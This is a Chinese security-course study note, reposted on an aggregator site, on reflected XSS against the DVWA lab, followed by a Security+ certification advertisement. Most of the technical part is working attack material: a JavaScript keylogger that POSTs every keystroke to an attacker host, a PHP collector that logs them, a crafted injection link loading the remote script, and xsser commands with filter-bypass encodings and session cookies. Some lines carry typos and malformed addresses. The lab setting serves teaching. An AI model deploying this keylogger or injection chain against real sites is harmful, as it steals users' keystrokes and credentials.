安全牛学习笔记XSS- 键盘记录器和反射型XSS
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了安全牛学习笔记XSS- 键盘记录器和反射型XSS相关的知识,希望对你有一定的参考价值。
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃XSS ┃
┃Keylogger.js ┃
┃document.onkeypress = function(evt){ ┃
┃ evt = evt || window.event ┃
┃ key = String.fromCharCode(evt.charCode) ┃
┃ if(key){ ┃
┃ var http = new XMLHttpRequest(); ┃
┃ var param = encodeUR(key); ┃
┃ http.open("POST","http://192.168.20.8/keylogger.php",true); ┃
┃ http.setRequestHeader("Content-type","application/x-www-form-urlencoded"); ┃
┃ http.send("key="+param); ┃
┃ } ┃
┃} ┃
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
[email protected]:~# service apache2 start
[email protected]:~# cd /var/www/html/
[email protected]:/var/www/html# gedit keylogger.js
document.onkeypress = function(evt){
evt = evt || window.event
key = String.fromCharCode(evt.charCode)
if(key){
var http = new XMLHttpRequest();
var param = encodeUR(key);
http.open("POST","http://192.168.20.8/keylogger.php",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("key="+param);
}
}
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃XSS ┃
┃Keylogger.php ┃
┃ <?php ┃
┃ $key=$_POST['key']; ┃
┃ $logfile="keylog.txt"; ┃
┃ $fp = fopen($logfile,"a"); ┃
┃ fwrite($fp,$key); ┃
┃ fclose($fp); ┃
┃ ?> ┃
┃<scirpt+src="http://1.1.1.1/keylogger.js"></script> ┃
┃<a ┃
┃herf="http://192.168.20.10/dvwa/vulnerabilites/xss_r/?name=<script+src='┃
┃http://192.168.1.20.8/keylogger.js'></script>">xss</a> ┃
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
[email protected]:/var/www/html# gedit keylogger.php
<?php
$key=$_POST['key'];
$logfile="keylog.txt";
$fp = fopen($logfile,"a");
fwrite($fp,$key);
fclose($fp);
?>
[email protected]:/var/www/html# gedit keylogger.txt
[email protected]:/var/www/html# ls
index.html keylogger.js keylogger.php keylog.txt
[email protected]:/var/www/html# chmod 777 keylog.txt
[email protected]:/var/www/html# gedit a.html
<a herf="http://192.168.1.107/dvwa/vulnerabilites/xss_r/?name=<script+src='http://192.168.1.1.102/keylogger.js'></script>">xss</a>
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃XSS ┃
┃Xsser ┃
┃ 命令/图形化 工具 ┃
┃ 绕过服务器端输入筛选 ┃
┃ 10进制/16进制 编码 ┃
┃ unescape() ┃
┃ xsser -u http://1.1.1.1/dvwa/vulnerabilities/" -g "xss_r/?name=" -- ┃
┃ cookie="security=low;PHPSESSID=d23e439411707ff8210717e67c521a81" -s ┃
┃ -v --reverse-check ┃
┃ --heuristic检查被过滤的字符 ┃
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
[email protected]:~# xsser --help
Usage:
xsser [OPTIONS] [-u <url> |-i <file> |-d <dork>] [-g <get> |-p <post> |-c <crawl>] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]
Cross Site "Scripter" is an automatic -framework- to detect, exploit and
report XSS vulnerabilities in web-based applications.
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-s, --statistics show advanced statistics output results
-v, --verbose active verbose mode output results
--gtk launch XSSer GTK Interface (Wizard included!)
*Special Features*:
You can choose Vector(s) and Bypasser(s) to inject code with this
extra special features:
--imx=IMX create a false image with XSS code embedded
--fla=FLASH create a false .swf file with XSS code embedded
*Select Target(s)*:
At least one of these options has to be specified to set the source to
get target(s) urls from. You need to choose to run XSSer:
-u URL, --url=URL Enter target(s) to audit
-i READFILE Read target urls from a file
-d DORK Process search engine dork results as target urls
--De=DORK_ENGINE Search engine to use for dorking (bing, altavista,
yahoo, baidu, yandex, youdao, webcrawler, google, etc.
See dork.py file to check for available engines)
*Select type of HTTP/HTTPS Connection(s)*:
These options can be used to specify which parameter(s) we want to use
like payload to inject code.
-g GETDATA Enter payload to audit using GET (ex: '/menu.php?q=')
-p POSTDATA Enter payload to audit using POST (ex: 'foo=1&bar=')
-c CRAWLING Number of urls to crawl on target(s): 1-99999
--Cw=CRAWLER_WIDTH Deeping level of crawler: 1-5
--Cl Crawl only local target(s) urls (default TRUE)
*Configure Request(s)*:
These options can be used to specify how to connect to target(s)
payload(s). You can choose multiple:
--cookie=COOKIE Change your HTTP Cookie header
--drop-cookie Ignore Set-Cookie header from response
--user-agent=AGENT Change your HTTP User-Agent header (default SPOOFED)
--referer=REFERER Use another HTTP Referer header (default NONE)
--xforw Set your HTTP X-Forwarded-For with random IP values
--xclient Set your HTTP X-Client-IP with random IP values
--headers=HEADERS Extra HTTP headers newline separated
--auth-type=ATYPE HTTP Authentication type (Basic, Digest, GSS or NTLM)
--auth-cred=ACRED HTTP Authentication credentials (name:password)
--proxy=PROXY Use proxy server (tor: http://localhost:8118)
--ignore-proxy Ignore system default HTTP proxy
--timeout=TIMEOUT Select your timeout (default 30)
--retries=RETRIES Retries when the connection timeouts (default 1)
--threads=THREADS Maximum number of concurrent HTTP requests (default 5)
--delay=DELAY Delay in seconds between each HTTP request (default 0)
--tcp-nodelay Use the TCP_NODELAY option
--follow-redirects XSSer will follow server redirection responses (302)
--follow-limit=FLI Set how many times XSSer will follow redirections
(default 50)
*Checker Systems*:
This options are usefull to know if your target(s) have some filters
against XSS attacks, to reduce 'false positive' results and to perform
more advanced tests:
--no-head NOT verify the stability of the url (codes: 200|302)
with a HEAD pre-check request
--alive=ISALIVE set limit of every how much errors XSSer must to
verify that target is alive
--hash send an unique hash, without vectors, to pre-check if
target(s) repeats all content recieved
--heuristic launch a heuristic testing to discover which
parameters are filtered on target(s) code: ;\/<>"'=
--checkaturl=ALT check for a valid XSS response from target(s) at an
alternative url. 'blind XSS'
--checkmethod=ALTM check responses from target(s) using a different
connection type: GET or POST (default: GET)
--checkatdata=ALD check responses from target(s) using an alternative
payload (default: same than first injection)
--reverse-check establish a reverse connection from target(s) to XSSer
to certificate that is 100% vulnerable
*Select Vector(s)*:
These options can be used to specify a XSS vector source code to
inject in each payload. Important, if you don't want to try to inject
a common XSS vector, used by default. Choose only one option:
--payload=SCRIPT OWN - Insert your XSS construction -manually-
--auto AUTO - Insert XSSer 'reported' vectors from file
(HTML5 vectors included!)
*Select Bypasser(s)*:
These options can be used to encode selected vector(s) to try to
bypass possible anti-XSS filters on target(s) code and possible IPS
rules, if the target use it. Also, can be combined with other
techniques to provide encoding:
--Str Use method String.FromCharCode()
--Une Use Unescape() function
--Mix Mix String.FromCharCode() and Unescape()
--Dec Use Decimal encoding
--Hex Use Hexadecimal encoding
--Hes Use Hexadecimal encoding, with semicolons
--Dwo Encode vectors IP addresses in DWORD
--Doo Encode vectors IP addresses in Octal
--Cem=CEM Try -manually- different Character Encoding Mutations
(reverse obfuscation: good) -> (ex: 'Mix,Une,Str,Hex')
*Special Technique(s)*:
These options can be used to try to inject code using different type
of XSS techniques. You can choose multiple:
--Coo COO - Cross Site Scripting Cookie injection
--Xsa XSA - Cross Site Agent Scripting
--Xsr XSR - Cross Site Referer Scripting
--Dcp DCP - Data Control Protocol injections
--Dom DOM - Document Object Model injections
--Ind IND - HTTP Response Splitting Induced code
--Anchor ANC - Use Anchor Stealth payloader (DOM shadows!)
--Phpids PHP - Exploit PHPIDS bug (0.6.5) to bypass filters
*Select Final injection(s)*:
These options can be used to specify the final code to inject in
vulnerable target(s). Important, if you want to exploit on-the-wild
your discovered vulnerabilities. Choose only one option:
--Fp=FINALPAYLOAD OWN - Insert your final code to inject -manually-
--Fr=FINALREMOTE REMOTE - Insert your final code to inject -remotelly-
--Doss DOSs - XSS Denial of service (server) injection
--Dos DOS - XSS Denial of service (client) injection
--B64 B64 - Base64 code encoding in META tag (rfc2397)
*Special Final injection(s)*:
These options can be used to execute some 'special' injection(s) in
vulnerable target(s). You can select multiple and combine with your
final code (except with DCP code):
--Onm ONM - Use onMouseMove() event to inject code
--Ifr IFR - Use <iframe> source tag to inject code
*Miscellaneous*:
--silent inhibit console output results
--update check for XSSer latest stable version
--save output all results directly to template (XSSlist.dat)
--xml=FILEXML output 'positives' to aXML file (--xml filename.xml)
--short=SHORTURLS display -final code- shortered (tinyurl, is.gd)
--launch launch a browser at the end with each XSS discovered
--tweet publish each XSS discovered into the 'Grey Swarm!'
--tweet-tags=TT add more tags to your XSS discovered publications
(default: #xss) - (ex: #xsser #vulnerability)
[email protected]:~# xsser --gtk //xsser图形化工具启动
[email protected]:~# xsser -u http://192.168.1.107/dvwa/vulnerabilities/" -g "xss_r/?name=" --cookie="security=low;PHPSESSID=d23e439411707ff8210717e67c521a81" -s -v --reverse-check
┃XSS
┃对payload编码,绕过服务器端筛选过滤
┃ --Str Use method String.FromCharCode()
┃ --Une Use Unescape() function
┃ --Mix Mix String.FromCharCode() and Unescape()
┃ --Dec Use Decimal encoding
┃ --Hex Use Hexadecimal encoding
┃ --Hes Use Hexadecimal encoding,with semicolons
┃ --Dwo Encode vectors IP addresses in DWORD
┃ --Doo Encode vectors IP addresses in Octal
┃ --Cem=CEM Try -manually- different Character Encoding Mutations
┃ (reverse obfuscation:good) -> (ex:'Mix,Une,Str,Hex')
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
┃XSS
┃注入技术(多选)
┃--Coo Cross Site Scripting Cookie injection
┃--Xsa Cross site Agent Scripting
┃--Xsr Cross site Referer Scripting
┃--Dcp Data Control Protocol injections
┃--Dom Document Object Mode injectins
┃--Ind HTTP Response Slitting Induced code
┃--Anchor Use Anchor Stealth payloader (DOM shadows!)
┃--Phpids PHP - Exploit PHPIDS bug (0.6.5) to bypass filters
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃XSS
┃--Doss XSS Denial of service (server) injection
┃--Dos XSS Denial of service (client
┃--B64 Base64 code encoidng in META tag (rfc2397)
┃--Onm ONM - Use onMouseMove() event to inject code
┃--lfr Use <iframe> source tag to inject code
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
┃XSS
┃Low
┃Mediam
┃High
┃ htmlspecialchars()
┃ 输出html编码< > < >
┃ xsser -u http://1.1.1.1/dvwa/vulnerabilities/" -g "xss_r/?name=" --
┃ cookie="security=low;PHPSESSID=d23e439411707ff8210717e67c521a81" -
┃ -Cem='Mix,Une,Str,Hex'
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
[email protected]:~# xsser -u http://192.168.107/dvwa/vulnerabilities/" -g "xss_r/?name=" --cookie="security=low;PHPSESSID=dd344b59dd74665c29bd031d035090f" --Cem='Mix,Une,Str,Hex
----------------------------------------------------------------
低安全代码
<?php
if(!array_key_exists ("name",$_GET) | $_GET['name'] == NULL || $_GET['name'] ==''){
$isempty = ture;
} else {
echo '<pre>';
echo 'hello'.$_GET['name'];
echo '</pre>'
}
?>
----------------------------------------------------------------------
该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂
Security+认证为什么是互联网+时代最火爆的认证?
牛妹先给大家介绍一下Security+
Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。
通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。
Security+认证如此火爆的原因?
原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。
目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。
原因二: IT运维人员工作与翻身的利器。
在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。
原因三:接地气、国际范儿、考试方便、费用适中!
CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。
在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。
以上是关于安全牛学习笔记XSS- 键盘记录器和反射型XSS的主要内容,如果未能解决你的问题,请参考以下文章